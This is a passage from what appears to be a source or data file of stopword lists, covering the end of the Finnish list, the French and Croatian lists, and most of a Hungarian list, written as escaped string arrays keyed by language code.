\"uudeksi\",\n        \"uudelleen\",\n        \"uuden\",\n        \"uudet\",\n        \"uusi\",\n        \"uusia\",\n        \"uusien\",\n        \"uusinta\",\n        \"uuteen\",\n        \"uutta\",\n        \"vaan\",\n        \"vahemmän\",\n        \"vai\",\n        \"vaiheessa\",\n        \"vaikea\",\n        \"vaikean\",\n        \"vaikeat\",\n        \"vaikeilla\",\n        \"vaikeille\",\n        \"vaikeilta\",\n        \"vaikeissa\",\n        \"vaikeista\",\n        \"vaikka\",\n        \"vain\",\n        \"varmasti\",\n        \"varsin\",\n        \"varsinkin\",\n        \"varten\",\n        \"vasen\",\n        \"vasenmalla\",\n        \"vasta\",\n        \"vastaan\",\n        \"vastakkain\",\n        \"vastan\",\n        \"verran\",\n        \"vielä\",\n        \"vierekkäin\",\n        \"vieressä\",\n        \"vieri\",\n        \"viiden\",\n        \"viime\",\n        \"viimeinen\",\n        \"viimeisen\",\n        \"viimeksi\",\n        \"viisi\",\n        \"voi\",\n        \"voidaan\",\n        \"voimme\",\n        \"voin\",\n        \"voisi\",\n        \"voit\",\n        \"voitte\",\n        \"voivat\",\n        \"vuoden\",\n        \"vuoksi\",\n        \"vuosi\",\n        \"vuosien\",\n        \"vuosina\",\n        \"vuotta\",\n        \"vähemmän\",\n        \"vähintään\",\n        \"vähiten\",\n        \"vähän\",\n        \"välillä\",\n        \"yhdeksän\",\n        \"yhden\",\n        \"yhdessä\",\n        \"yhteen\",\n        \"yhteensä\",\n        \"yhteydessä\",\n        \"yhteyteen\",\n        \"yhtä\",\n        \"yhtäälle\",\n        \"yhtäällä\",\n        \"yhtäältä\",\n        \"yhtään\",\n        \"yhä\",\n        \"yksi\",\n        \"yksin\",\n        \"yksittäin\",\n        \"yleensä\",\n        \"ylemmäs\",\n        \"yli\",\n        \"ylös\",\n        \"ympäri\",\n        \"älköön\",\n        \"älä\",\n    ],\n    \"fr\": [\n        \"a\",\n        \"abord\",\n        \"absolument\",\n        \"afin\",\n        \"ah\",\n        \"ai\",\n        \"aie\",\n        \"ailleurs\",\n        \"ainsi\",\n        \"ait\",\n        \"allaient\",\n        \"allo\",\n        \"allons\",\n        \"allô\",\n        \"alors\",\n        \"anterieur\",\n        \"anterieure\",\n        \"anterieures\",\n        \"apres\",\n        \"après\",\n        \"as\",\n        \"assez\",\n        \"attendu\",\n        \"au\",\n        \"aucun\",\n        \"aucune\",\n        \"aujourd\",\n        \"aujourd'hui\",\n        \"aupres\",\n        \"auquel\",\n        \"aura\",\n        \"auraient\",\n        \"aurait\",\n        \"auront\",\n        \"aussi\",\n        \"autre\",\n        \"autrefois\",\n        \"autrement\",\n        \"autres\",\n        \"autrui\",\n        \"aux\",\n        \"auxquelles\",\n        \"auxquels\",\n        \"avaient\",\n        \"avais\",\n        \"avait\",\n        \"avant\",\n        \"avec\",\n        \"avoir\",\n        \"avons\",\n        \"ayant\",\n        \"b\",\n        \"bah\",\n        \"bas\",\n        \"basee\",\n        \"bat\",\n        \"beau\",\n        \"beaucoup\",\n        \"bien\",\n        \"bigre\",\n        \"boum\",\n        \"bravo\",\n        \"brrr\",\n        \"c\",\n        \"car\",\n        \"ce\",\n        \"ceci\",\n        \"cela\",\n        \"celle\",\n        \"celle-ci\",\n        \"celle-là\",\n        \"celles\",\n        \"celles-ci\",\n        \"celles-là\",\n        \"celui\",\n        \"celui-ci\",\n        \"celui-là\",\n        \"cent\",\n        \"cependant\",\n        \"certain\",\n        \"certaine\",\n        \"certaines\",\n        \"certains\",\n        \"certes\",\n        \"ces\",\n        \"cet\",\n        \"cette\",\n        \"ceux\",\n        \"ceux-ci\",\n        \"ceux-là\",\n        \"chacun\",\n        \"chacune\",\n        \"chaque\",\n        \"cher\",\n        \"chers\",\n        \"chez\",\n        \"chiche\",\n        \"chut\",\n        \"chère\",\n        \"chères\",\n        \"ci\",\n        \"cinq\",\n        \"cinquantaine\",\n        \"cinquante\",\n        \"cinquantième\",\n        \"cinquième\",\n        \"clac\",\n        \"clic\",\n        \"combien\",\n        \"comme\",\n        \"comment\",\n        \"comparable\",\n        \"comparables\",\n        \"compris\",\n        \"concernant\",\n        \"contre\",\n        \"couic\",\n        \"crac\",\n        \"d\",\n        \"da\",\n        \"dans\",\n        \"de\",\n        \"debout\",\n        \"dedans\",\n        \"dehors\",\n        \"deja\",\n        \"delà\",\n        \"depuis\",\n        \"dernier\",\n        \"derniere\",\n        \"derriere\",\n        \"derrière\",\n        \"des\",\n        \"desormais\",\n        \"desquelles\",\n        \"desquels\",\n        \"dessous\",\n        \"dessus\",\n        \"deux\",\n        \"deuxième\",\n        \"deuxièmement\",\n        \"devant\",\n        \"devers\",\n        \"devra\",\n        \"different\",\n        \"differentes\",\n        \"differents\",\n        \"différent\",\n        \"différente\",\n        \"différentes\",\n        \"différents\",\n        \"dire\",\n        \"directe\",\n        \"directement\",\n        \"dit\",\n        \"dite\",\n        \"dits\",\n        \"divers\",\n        \"diverse\",\n        \"diverses\",\n        \"dix\",\n        \"dix-huit\",\n        \"dix-neuf\",\n        \"dix-sept\",\n        \"dixième\",\n        \"doit\",\n        \"doivent\",\n        \"donc\",\n        \"dont\",\n        \"douze\",\n        \"douzième\",\n        \"dring\",\n        \"du\",\n        \"duquel\",\n        \"durant\",\n        \"dès\",\n        \"désormais\",\n        \"e\",\n        \"effet\",\n        \"egale\",\n        \"egalement\",\n        \"egales\",\n        \"eh\",\n        \"elle\",\n        \"elle-même\",\n        \"elles\",\n        \"elles-mêmes\",\n        \"en\",\n        \"encore\",\n        \"enfin\",\n        \"entre\",\n        \"envers\",\n        \"environ\",\n        \"es\",\n        \"est\",\n        \"et\",\n        \"etant\",\n        \"etc\",\n        \"etre\",\n        \"eu\",\n        \"euh\",\n        \"eux\",\n        \"eux-mêmes\",\n        \"exactement\",\n        \"excepté\",\n        \"extenso\",\n        \"exterieur\",\n        \"f\",\n        \"fais\",\n        \"faisaient\",\n        \"faisant\",\n        \"fait\",\n        \"façon\",\n        \"feront\",\n        \"fi\",\n        \"flac\",\n        \"floc\",\n        \"font\",\n        \"g\",\n        \"gens\",\n        \"h\",\n        \"ha\",\n        \"hein\",\n        \"hem\",\n        \"hep\",\n        \"hi\",\n        \"ho\",\n        \"holà\",\n        \"hop\",\n        \"hormis\",\n        \"hors\",\n        \"hou\",\n        \"houp\",\n        \"hue\",\n        \"hui\",\n        \"huit\",\n        \"huitième\",\n        \"hum\",\n        \"hurrah\",\n        \"hé\",\n        \"hélas\",\n        \"i\",\n        \"il\",\n        \"ils\",\n        \"importe\",\n        \"j\",\n        \"je\",\n        \"jusqu\",\n        \"jusque\",\n        \"juste\",\n        \"k\",\n        \"l\",\n        \"la\",\n        \"laisser\",\n        \"laquelle\",\n        \"las\",\n        \"le\",\n        \"lequel\",\n        \"les\",\n        \"lesquelles\",\n        \"lesquels\",\n        \"leur\",\n        \"leurs\",\n        \"longtemps\",\n        \"lors\",\n        \"lorsque\",\n        \"lui\",\n        \"lui-meme\",\n        \"lui-même\",\n        \"là\",\n        \"lès\",\n        \"m\",\n        \"ma\",\n        \"maint\",\n        \"maintenant\",\n        \"mais\",\n        \"malgre\",\n        \"malgré\",\n        \"maximale\",\n        \"me\",\n        \"meme\",\n        \"memes\",\n        \"merci\",\n        \"mes\",\n        \"mien\",\n        \"mienne\",\n        \"miennes\",\n        \"miens\",\n        \"mille\",\n        \"mince\",\n        \"minimale\",\n        \"moi\",\n        \"moi-meme\",\n        \"moi-même\",\n        \"moindres\",\n        \"moins\",\n        \"mon\",\n        \"moyennant\",\n        \"multiple\",\n        \"multiples\",\n        \"même\",\n        \"mêmes\",\n        \"n\",\n        \"na\",\n        \"naturel\",\n        \"naturelle\",\n        \"naturelles\",\n        \"ne\",\n        \"neanmoins\",\n        \"necessaire\",\n        \"necessairement\",\n        \"neuf\",\n        \"neuvième\",\n        \"ni\",\n        \"nombreuses\",\n        \"nombreux\",\n        \"non\",\n        \"nos\",\n        \"notamment\",\n        \"notre\",\n        \"nous\",\n        \"nous-mêmes\",\n        \"nouveau\",\n        \"nul\",\n        \"néanmoins\",\n        \"nôtre\",\n        \"nôtres\",\n        \"o\",\n        \"oh\",\n        \"ohé\",\n        \"ollé\",\n        \"olé\",\n        \"on\",\n        \"ont\",\n        \"onze\",\n        \"onzième\",\n        \"ore\",\n        \"ou\",\n        \"ouf\",\n        \"ouias\",\n        \"oust\",\n        \"ouste\",\n        \"outre\",\n        \"ouvert\",\n        \"ouverte\",\n        \"ouverts\",\n        \"o|\",\n        \"où\",\n        \"p\",\n        \"paf\",\n        \"pan\",\n        \"par\",\n        \"parce\",\n        \"parfois\",\n        \"parle\",\n        \"parlent\",\n        \"parler\",\n        \"parmi\",\n        \"parseme\",\n        \"partant\",\n        \"particulier\",\n        \"particulière\",\n        \"particulièrement\",\n        \"pas\",\n        \"passé\",\n        \"pendant\",\n        \"pense\",\n        \"permet\",\n        \"personne\",\n        \"peu\",\n        \"peut\",\n        \"peuvent\",\n        \"peux\",\n        \"pff\",\n        \"pfft\",\n        \"pfut\",\n        \"pif\",\n        \"pire\",\n        \"plein\",\n        \"plouf\",\n        \"plus\",\n        \"plusieurs\",\n        \"plutôt\",\n        \"possessif\",\n        \"possessifs\",\n        \"possible\",\n        \"possibles\",\n        \"pouah\",\n        \"pour\",\n        \"pourquoi\",\n        \"pourrais\",\n        \"pourrait\",\n        \"pouvait\",\n        \"prealable\",\n        \"precisement\",\n        \"premier\",\n        \"première\",\n        \"premièrement\",\n        \"pres\",\n        \"probable\",\n        \"probante\",\n        \"procedant\",\n        \"proche\",\n        \"près\",\n        \"psitt\",\n        \"pu\",\n        \"puis\",\n        \"puisque\",\n        \"pur\",\n        \"pure\",\n        \"q\",\n        \"qu\",\n        \"quand\",\n        \"quant\",\n        \"quant-à-soi\",\n        \"quanta\",\n        \"quarante\",\n        \"quatorze\",\n        \"quatre\",\n        \"quatre-vingt\",\n        \"quatrième\",\n        \"quatrièmement\",\n        \"que\",\n        \"quel\",\n        \"quelconque\",\n        \"quelle\",\n        \"quelles\",\n        \"quelqu'un\",\n        \"quelque\",\n        \"quelques\",\n        \"quels\",\n        \"qui\",\n        \"quiconque\",\n        \"quinze\",\n        \"quoi\",\n        \"quoique\",\n        \"r\",\n        \"rare\",\n        \"rarement\",\n        \"rares\",\n        \"relative\",\n        \"relativement\",\n        \"remarquable\",\n        \"rend\",\n        \"rendre\",\n        \"restant\",\n        \"reste\",\n        \"restent\",\n        \"restrictif\",\n        \"retour\",\n        \"revoici\",\n        \"revoilà\",\n        \"rien\",\n        \"s\",\n        \"sa\",\n        \"sacrebleu\",\n        \"sait\",\n        \"sans\",\n        \"sapristi\",\n        \"sauf\",\n        \"se\",\n        \"sein\",\n        \"seize\",\n        \"selon\",\n        \"semblable\",\n        \"semblaient\",\n        \"semble\",\n        \"semblent\",\n        \"sent\",\n        \"sept\",\n        \"septième\",\n        \"sera\",\n        \"seraient\",\n        \"serait\",\n        \"seront\",\n        \"ses\",\n        \"seul\",\n        \"seule\",\n        \"seulement\",\n        \"si\",\n        \"sien\",\n        \"sienne\",\n        \"siennes\",\n        \"siens\",\n        \"sinon\",\n        \"six\",\n        \"sixième\",\n        \"soi\",\n        \"soi-même\",\n        \"soit\",\n        \"soixante\",\n        \"son\",\n        \"sont\",\n        \"sous\",\n        \"souvent\",\n        \"specifique\",\n        \"specifiques\",\n        \"speculatif\",\n        \"stop\",\n        \"strictement\",\n        \"subtiles\",\n        \"suffisant\",\n        \"suffisante\",\n        \"suffit\",\n        \"suis\",\n        \"suit\",\n        \"suivant\",\n        \"suivante\",\n        \"suivantes\",\n        \"suivants\",\n        \"suivre\",\n        \"superpose\",\n        \"sur\",\n        \"surtout\",\n        \"t\",\n        \"ta\",\n        \"tac\",\n        \"tant\",\n        \"tardive\",\n        \"te\",\n        \"tel\",\n        \"telle\",\n        \"tellement\",\n        \"telles\",\n        \"tels\",\n        \"tenant\",\n        \"tend\",\n        \"tenir\",\n        \"tente\",\n        \"tes\",\n        \"tic\",\n        \"tien\",\n        \"tienne\",\n        \"tiennes\",\n        \"tiens\",\n        \"toc\",\n        \"toi\",\n        \"toi-même\",\n        \"ton\",\n        \"touchant\",\n        \"toujours\",\n        \"tous\",\n        \"tout\",\n        \"toute\",\n        \"toutefois\",\n        \"toutes\",\n        \"treize\",\n        \"trente\",\n        \"tres\",\n        \"trois\",\n        \"troisième\",\n        \"troisièmement\",\n        \"trop\",\n        \"très\",\n        \"tsoin\",\n        \"tsouin\",\n        \"tu\",\n        \"té\",\n        \"u\",\n        \"un\",\n        \"une\",\n        \"unes\",\n        \"uniformement\",\n        \"unique\",\n        \"uniques\",\n        \"uns\",\n        \"v\",\n        \"va\",\n        \"vais\",\n        \"vas\",\n        \"vers\",\n        \"via\",\n        \"vif\",\n        \"vifs\",\n        \"vingt\",\n        \"vivat\",\n        \"vive\",\n        \"vives\",\n        \"vlan\",\n        \"voici\",\n        \"voilà\",\n        \"vont\",\n        \"vos\",\n        \"votre\",\n        \"vous\",\n        \"vous-mêmes\",\n        \"vu\",\n        \"vé\",\n        \"vôtre\",\n        \"vôtres\",\n        \"w\",\n        \"x\",\n        \"y\",\n        \"z\",\n        \"zut\",\n        \"à\",\n        \"â\",\n        \"ça\",\n        \"ès\",\n        \"étaient\",\n        \"étais\",\n        \"était\",\n        \"étant\",\n        \"été\",\n        \"être\",\n        \"ô\",\n    ],\n    \"hr\": [\n        \"a\",\n        \"ako\",\n        \"ali\",\n        \"bi\",\n        \"bih\",\n        \"bila\",\n        \"bili\",\n        \"bilo\",\n        \"bio\",\n        \"bismo\",\n        \"biste\",\n        \"biti\",\n        \"bumo\",\n        \"da\",\n        \"do\",\n        \"duž\",\n        \"ga\",\n        \"hoće\",\n        \"hoćemo\",\n        \"hoćete\",\n        \"hoćeš\",\n        \"hoću\",\n        \"i\",\n        \"iako\",\n        \"ih\",\n        \"ili\",\n        \"iz\",\n        \"ja\",\n        \"je\",\n        \"jedna\",\n        \"jedne\",\n        \"jedno\",\n        \"jer\",\n        \"jesam\",\n        \"jesi\",\n        \"jesmo\",\n        \"jest\",\n        \"jeste\",\n        \"jesu\",\n        \"jim\",\n        \"joj\",\n        \"još\",\n        \"ju\",\n        \"kada\",\n        \"kako\",\n        \"kao\",\n        \"koja\",\n        \"koje\",\n        \"koji\",\n        \"kojima\",\n        \"koju\",\n        \"kroz\",\n        \"li\",\n        \"me\",\n        \"mene\",\n        \"meni\",\n        \"mi\",\n        \"mimo\",\n        \"moj\",\n        \"moja\",\n        \"moje\",\n        \"mu\",\n        \"na\",\n        \"nad\",\n        \"nakon\",\n        \"nam\",\n        \"nama\",\n        \"nas\",\n        \"naš\",\n        \"naša\",\n        \"naše\",\n        \"našeg\",\n        \"ne\",\n        \"nego\",\n        \"neka\",\n        \"neki\",\n        \"nekog\",\n        \"neku\",\n        \"nema\",\n        \"netko\",\n        \"neće\",\n        \"nećemo\",\n        \"nećete\",\n        \"nećeš\",\n        \"neću\",\n        \"nešto\",\n        \"ni\",\n        \"nije\",\n        \"nikoga\",\n        \"nikoje\",\n        \"nikoju\",\n        \"nisam\",\n        \"nisi\",\n        \"nismo\",\n        \"niste\",\n        \"nisu\",\n        \"njega\",\n        \"njegov\",\n        \"njegova\",\n        \"njegovo\",\n        \"njemu\",\n        \"njezin\",\n        \"njezina\",\n        \"njezino\",\n        \"njih\",\n        \"njihov\",\n        \"njihova\",\n        \"njihovo\",\n        \"njim\",\n        \"njima\",\n        \"njoj\",\n        \"nju\",\n        \"no\",\n        \"o\",\n        \"od\",\n        \"odmah\",\n        \"on\",\n        \"ona\",\n        \"oni\",\n        \"ono\",\n        \"ova\",\n        \"pa\",\n        \"pak\",\n        \"po\",\n        \"pod\",\n        \"pored\",\n        \"prije\",\n        \"s\",\n        \"sa\",\n        \"sam\",\n        \"samo\",\n        \"se\",\n        \"sebe\",\n        \"sebi\",\n        \"si\",\n        \"smo\",\n        \"ste\",\n        \"su\",\n        \"sve\",\n        \"svi\",\n        \"svog\",\n        \"svoj\",\n        \"svoja\",\n        \"svoje\",\n        \"svom\",\n        \"ta\",\n        \"tada\",\n        \"taj\",\n        \"tako\",\n        \"te\",\n        \"tebe\",\n        \"tebi\",\n        \"ti\",\n        \"to\",\n        \"toj\",\n        \"tome\",\n        \"tu\",\n        \"tvoj\",\n        \"tvoja\",\n        \"tvoje\",\n        \"u\",\n        \"uz\",\n        \"vam\",\n        \"vama\",\n        \"vas\",\n        \"vaš\",\n        \"vaša\",\n        \"vaše\",\n        \"već\",\n        \"vi\",\n        \"vrlo\",\n        \"za\",\n        \"zar\",\n        \"će\",\n        \"ćemo\",\n        \"ćete\",\n        \"ćeš\",\n        \"ću\",\n        \"što\",\n    ],\n    \"hu\": [\n        \"a\",\n        \"abba\",\n        \"abban\",\n        \"abból\",\n        \"addig\",\n        \"ahhoz\",\n        \"ahogy\",\n        \"ahol\",\n        \"aki\",\n        \"akik\",\n        \"akkor\",\n        \"akár\",\n        \"alapján\",\n        \"alatt\",\n        \"alatta\",\n        \"alattad\",\n        \"alattam\",\n        \"alattatok\",\n        \"alattuk\",\n        \"alattunk\",\n        \"alá\",\n        \"alád\",\n        \"alájuk\",\n        \"alám\",\n        \"alánk\",\n        \"alátok\",\n        \"alól\",\n        \"alóla\",\n        \"alólad\",\n        \"alólam\",\n        \"alólatok\",\n        \"alóluk\",\n        \"alólunk\",\n        \"amely\",\n        \"amelybol\",\n        \"amelyek\",\n        \"amelyekben\",\n        \"amelyeket\",\n        \"amelyet\",\n        \"amelyik\",\n        \"amelynek\",\n        \"ami\",\n        \"amikor\",\n        \"amit\",\n        \"amolyan\",\n        \"amott\",\n        \"amíg\",\n        \"annak\",\n        \"annál\",\n        \"arra\",\n        \"arról\",\n        \"attól\",\n        \"az\",\n        \"aznap\",\n        \"azok\",\n        \"azokat\",\n        \"azokba\",\n        \"azokban\",\n        \"azokból\",\n        \"azokhoz\",\n        \"azokig\",\n        \"azokkal\",\n        \"azokká\",\n        \"azoknak\",\n        \"azoknál\",\n        \"azokon\",\n        \"azokra\",\n        \"azokról\",\n        \"azoktól\",\n        \"azokért\",\n        \"azon\",\n        \"azonban\",\n        \"azonnal\",\n        \"azt\",\n        \"aztán\",\n        \"azután\",\n        \"azzal\",\n        \"azzá\",\n        \"azért\",\n        \"bal\",\n        \"balra\",\n        \"ban\",\n        \"be\",\n        \"belé\",\n        \"beléd\",\n        \"beléjük\",\n        \"belém\",\n        \"belénk\",\n        \"belétek\",\n        \"belül\",\n        \"belőle\",\n        \"belőled\",\n        \"belőlem\",\n        \"belőletek\",\n        \"belőlük\",\n        \"belőlünk\",\n        \"ben\",\n        \"benne\",\n        \"benned\",\n        \"bennem\",\n        \"bennetek\",\n        \"bennük\",\n        \"bennünk\",\n        \"bár\",\n        \"bárcsak\",\n        \"bármilyen\",\n        \"búcsú\",\n        \"cikk\",\n        \"cikkek\",\n        \"cikkeket\",\n        \"csak\",\n        \"csakhogy\",\n        \"csupán\",\n        \"de\",\n        \"dehogy\",\n        \"e\",\n        \"ebbe\",\n        \"ebben\",\n        \"ebből\",\n        \"eddig\",\n        \"egy\",\n        \"egyebek\",\n        \"egyebet\",\n        \"egyedül\",\n        \"egyelőre\",\n        \"egyes\",\n        \"egyet\",\n        \"egyetlen\",\n        \"egyik\",\n        \"egymás\",\n        \"egyre\",\n        \"egyszerre\",\n        \"egyéb\",\n        \"együtt\",\n        \"egész\",\n        \"egészen\",\n        \"ehhez\",\n        \"ekkor\",\n        \"el\",\n        \"eleinte\",\n        \"ellen\",\n        \"ellenes\",\n        \"elleni\",\n        \"ellenére\",\n        \"elmondta\",\n        \"első\",\n        \"elsők\",\n        \"elsősorban\",\n        \"elsőt\",\n        \"elé\",\n        \"eléd\",\n        \"elég\",\n        \"eléjük\",\n        \"elém\",\n        \"elénk\",\n        \"elétek\",\n        \"elő\",\n        \"előbb\",\n        \"elől\",\n        \"előle\",\n        \"előled\",\n        \"előlem\",\n        \"előletek\",\n        \"előlük\",\n        \"előlünk\",\n        \"először\",\n        \"előtt\",\n        \"előtte\",\n        \"előtted\",\n        \"előttem\",\n        \"előttetek\",\n        \"előttük\",\n        \"előttünk\",\n        \"előző\",\n        \"emilyen\",\n        \"engem\",\n        \"ennek\",\n        \"ennyi\",\n        \"ennél\",\n        \"enyém\",\n        \"erre\",\n        \"erről\",\n        \"esetben\",\n        \"ettől\",\n        \"ez\",\n        \"ezek\",\n        \"ezekbe\",\n        \"ezekben\",\n        \"ezekből\",\n        \"ezeken\",\n        \"ezeket\",\n        \"ezekhez\",\n        \"ezekig\",\n        \"ezekkel\",\n        \"ezekké\",\n        \"ezeknek\",\n        \"ezeknél\",\n        \"ezekre\",\n        \"ezekről\",\n        \"ezektől\",\n        \"ezekért\",\n        \"ezen\",\n        \"ezentúl\",\n        \"ezer\",\n        \"ezret\",\n        \"ezt\",\n        \"ezután\",\n        \"ezzel\",\n        \"ezzé\",\n        \"ezért\",\n        \"fel\",\n        \"fele\",\n        \"felek\",\n        \"felet\",\n        \"felett\",\n        \"felé\",\n        \"fent\",\n        \"fenti\",\n        \"fél\",\n        \"fölé\",\n        \"gyakran\",\n        \"ha\",\n        \"halló\",\n        \"hamar\",\n        \"hanem\",\n        \"harmadik\",\n        \"harmadikat\",\n        \"harminc\",\n        \"hat\",\n        \"hatodik\",\n        \"hatodikat\",\n        \"hatot\",\n        \"hatvan\",\n        \"helyett\",\n        \"hetedik\",\n        \"hetediket\",\n        \"hetet\",\n        \"hetven\",\n        \"hirtelen\",\n        \"hiszen\",\n        \"hiába\",\n        \"hogy\",\n        \"hogyan\",\n        \"hol\",\n        \"holnap\",\n        \"holnapot\",\n        \"honnan\",\n        \"hova\",\n        \"hozzá\",\n        \"hozzád\",\n        \"hozzájuk\",\n        \"hozzám\",\n        \"hozzánk\",\n        \"hozzátok\",\n        \"hurrá\",\n        \"huszadik\",\n        \"hány\",\n        \"hányszor\",\n        \"hármat\",\n        \"három\",\n        \"hát\",\n        \"hátha\",\n        \"hátulsó\",\n        \"hét\",\n        \"húsz\",\n        \"ide\",\n        \"ide-оda\",\n        \"idén\",\n        \"igazán\",\n        \"igen\",\n        \"ill\",\n        \"illetve\",\n        \"ilyen\",\n        \"ilyenkor\",\n        \"immár\",\n        \"inkább\",\n        \"is\",\n        \"ismét\",\n        \"ison\",\n        \"itt\",\n        \"jelenleg\",\n        \"jobban\",\n        \"jobbra\",\n        \"jó\",\n        \"jól\",\n        \"jólesik\",\n        \"jóval\",\n        \"jövőre\",\n        \"kell\",\n        \"kellene\",\n        \"kellett\",\n        \"kelljen\",\n        \"keressünk\",\n        \"keresztül\",\n        \"ketten\",\n        \"kettő\",\n        \"kettőt\",\n        \"kevés\",\n        \"ki\",\n        \"kiben\",\n        \"kiből\",\n        \"kicsit\",\n        \"kicsoda\",\n        \"kihez\",\n        \"kik\",\n        \"kikbe\",\n        \"kikben\",\n        \"kikből\",\n        \"kiken\",\n        \"kiket\",\n        \"kikhez\",\n        \"kikkel\",\n        \"kikké\",\n        \"kiknek\",\n        \"kiknél\",\n        \"kikre\",\n        \"kikről\",\n        \"kiktől\",\n        \"kikért\",\n        \"kilenc\",\n        \"kilencedik\",\n        \"kilencediket\",\n        \"kilencet\",\n        \"kilencven\",\n        \"kin\",\n        \"kinek\",\n        \"kinél\",\n        \"kire\",\n        \"kiről\",\n        \"kit\",\n        \"kitől\",\n        \"kivel\",\n        \"kivé\",\n        \"kié\",\n        \"kiért\",\n        \"korábban\",\n        \"képest\",\n        \"kérem\",\n        \"kérlek\",\n        \"kész\",\n        \"késő\",\n        \"később\",\n        \"későn\",\n        \"két\",\n        \"kétszer\",\n        \"kívül\",\n        \"körül\",\n        \"köszönhetően\",\n        \"köszönöm\",\n        \"közben\",\n        \"közel\",\n        \"közepesen\",\n        \"közepén\",\n        \"közé\",\n        \"között\",\n        \"közül\",\n        \"külön\",\n        \"különben\",\n        \"különböző\",\n        \"különbözőbb\",\n        \"különbözőek\",\n        \"lassan\",\n        \"le\",\n        \"legalább\",\n        \"legyen\",\n        \"lehet\",\n        \"lehetetlen\",\n        \"lehetett\",\n        \"lehetőleg\",\n        \"lehetőség\",\n        \"lenne\",\n        \"lenni\",\n        \"lennék\",\n        \"lennének\",\n        \"lesz\",\n        \"leszek\",\n        \"lesznek\",\n        \"leszünk\",\n        \"lett\",\n        \"lettek\",\n        \"lettem\",\n        \"lettünk\",\n        \"lévő\",\n        \"ma\",\n        \"maga\",\n        \"magad\",\n        \"magam\",\n        \"magatokat\",\n        \"magukat\",\n        \"magunkat\",\n        \"magát\",\n        \"mai\",\n        \"majd\",\n        \"majdnem\",\n        \"manapság\",\n        \"meg\",\n        \"megcsinál\",\n        \"megcsinálnak\",\n        \"megint\",\n        \"megvan\",\n        \"mellett\",\n        \"mellette\",\n        \"melletted\",\n        \"mellettem\",\n        \"mellettetek\",\n        \"mellettük\",\n        \"mellettünk\",\n        \"mellé\",\n        \"melléd\",\n        \"melléjük\",\n        \"mellém\",\n        \"mellénk\",\n        \"mellétek\",\n        \"mellől\",\n        \"mellőle\",\n        \"mellőled\",\n        \"mellőlem\",\n        \"mellőletek\",\n        \"mellőlük\",\n        \"mellőlünk\",\n        \"mely\",\n        \"melyek\",\n        \"melyik\",\n        \"mennyi\",\n        \"mert\",\n        \"mi\",\n        \"miatt\",\n        \"miatta\",\n        \"miattad\",\n        \"miattam\",\n        \"miattatok\",\n        \"miattuk\",\n        \"miattunk\",\n        \"mibe\",\n        \"miben\",\n        \"miből\",\n        \"mihez\",\n        \"mik\",\n        \"mikbe\",\n        \"mikben\",\n        \"mikből\",\n        \"miken\",\n        \"miket\",\n        \"mikhez\",\n        \"mikkel\",\n        \"mikké\",\n        \"miknek\",\n        \"miknél\",\n        \"mikor\",\n        \"mikre\",\n        \"mikről\",\n        \"miktől\",\n        \"mikért\",\n        \"milyen\",\n        \"min\",\n        \"mind\",\n        \"mindegyik\",\n        \"mindegyiket\",\n        \"minden\",\n        \"mindenesetre\",\n        \"mindenki\",\n        \"mindent\",\n        \"mindenütt\",\n        \"mindig\",\n        \"mindketten\",\n        \"minek\",\n        \"minket\",\n        \"mint\",\n        \"mintha\",\n        \"minél\",\n        \"mire\",\n        \"miről\",\n        \"mit\",\n        \"mitől\",\n        \"mivel\",\n        \"mivé\",\n        \"miért\",\n        \"mondta\",\n        \"most\",\n        \"mostanáig\",\n        \"már\",\n        \"más\",\n        \"másik\",\n        \"másikat\",\n        \"másnap\",\n        \"második\",\n        \"másodszor\",\n        \"mások\",\n        \"másokat\",\n        \"mást\",\n        \"még\",\n        \"mégis\",\n        \"míg\",\n        \"mögé\",\n        \"mögéd\",\n        \"mögéjük\",\n        \"mögém\",\n        \"mögénk\",\n        \"mögétek\",\n        \"mögött\",\n        \"mögötte\",\n        \"mögötted\",\n        \"mögöttem\",\n        \"mögöttetek\",\n        \"mögöttük\",\n        \"mögöttünk\",\n        \"mögül\",\n        \"mögüle\",\n        \"mögüled\",\n        \"mögülem\",\n        \"mögületek\",\n        \"mögülük\",\n        \"mögülünk\",\n        \"múltkor\",\n        \"múlva\",\n        \"na\",\n        \"nagy\",\n        \"nagyobb\",\n        \"nagyon\",\n        \"naponta\",\n        \"napot\",\n        \"ne\",\n        \"negyedik\",\n        \"negyediket\",\n        \"negyven\",\n        \"neked\",\n        \"nekem\",\n        \"neki\",\n        \"nekik\",\n        \"nektek\",\n        \"nekünk\",\n        \"nem\",\n        \"nemcsak\",\n        \"nemrég\",\n        \"nincs\",\n        \"nyolc\",\n        \"nyolcadik\",\n        \"nyolcadikat\",\n        \"nyolcat\",\n        \"nyolcvan\",\n        \"nála\",\n        \"nálad\",\n        \"nálam\",\n        \"nálatok\",\n        \"náluk\",\n        \"nálunk\",\n        \"négy\",\n        \"négyet\",\n        \"néha\",\n        \"néhány\",\n        \"nélkül\",\n        \"o\",\n        \"oda\",\n        \"ok\",\n        \"olyan\",\n        \"onnan\",\n        \"ott\",\n        \"pedig\",\n        \"persze\",\n        \"pár\",\n        \"például\",\n        \"rajta\",\n        \"rajtad\",\n        \"rajtam\",\n        \"rajtatok\",\n        \"rajtuk\",\n        \"rajtunk\",\n        \"rendben\",\n        \"rosszul\",\n        \"rá\",\n        \"rád\",\n        \"rájuk\",\n        \"rám\",\n        \"ránk\",\n        \"rátok\",\n        \"régen\",\n        \"régóta\",\n        \"részére\",\n        \"róla\",\n        \"rólad\",\n        \"rólam\",\n        \"rólatok\",\n        \"róluk\",\n        \"rólunk\",\n        \"rögtön\",\n        \"s\",\n        \"saját\",\n        \"se\",\n        \"sem\",\n        \"semmi\",\n        \"semmilyen\",\n        \"semmiség\",\n        \"senki\",\n        \"soha\",\n        \"sok\",\n        \"sokan\",\n        \"sokat\",\n        \"sokkal\",\n        \"sokszor\",\n        \"sokáig\",\n        \"során\",\n        \"stb.\",\n        \"szemben\",\n        \"szerbusz\",\n        \"szerint\",\n        \"szerinte\",\n        \"szerinted\",\n        \"szerintem\",\n        \"szerintetek\",\n        \"szerintük\",\n        \"szerintünk\",\n        \"szervusz\",\n        \"szinte\",\n        \"számára\",\n        \"száz\",\n        \"századik\",\n        \"százat\",\n        \"szépen\",\n        \"szét\",\n        \"szíves\",\n        \"szívesen\",\n        \"szíveskedjék\",\n        \"sőt\",\n        \"talán\",\n        \"tavaly\",\n        \"te\",\n        \"tegnap\",\n        \"tegnapelőtt\",\n        \"tehát\",\n        \"tele\",\n        \"teljes\",\n        \"tessék\",\n        \"ti\",\n        \"tied\",\n        \"titeket\",\n        \"tizedik\",\n        \"tizediket\",\n        \"tizenegy\",\n        \"tizenegyedik\",\n        \"tizenhat\",\n        \"tizenhárom\",\n        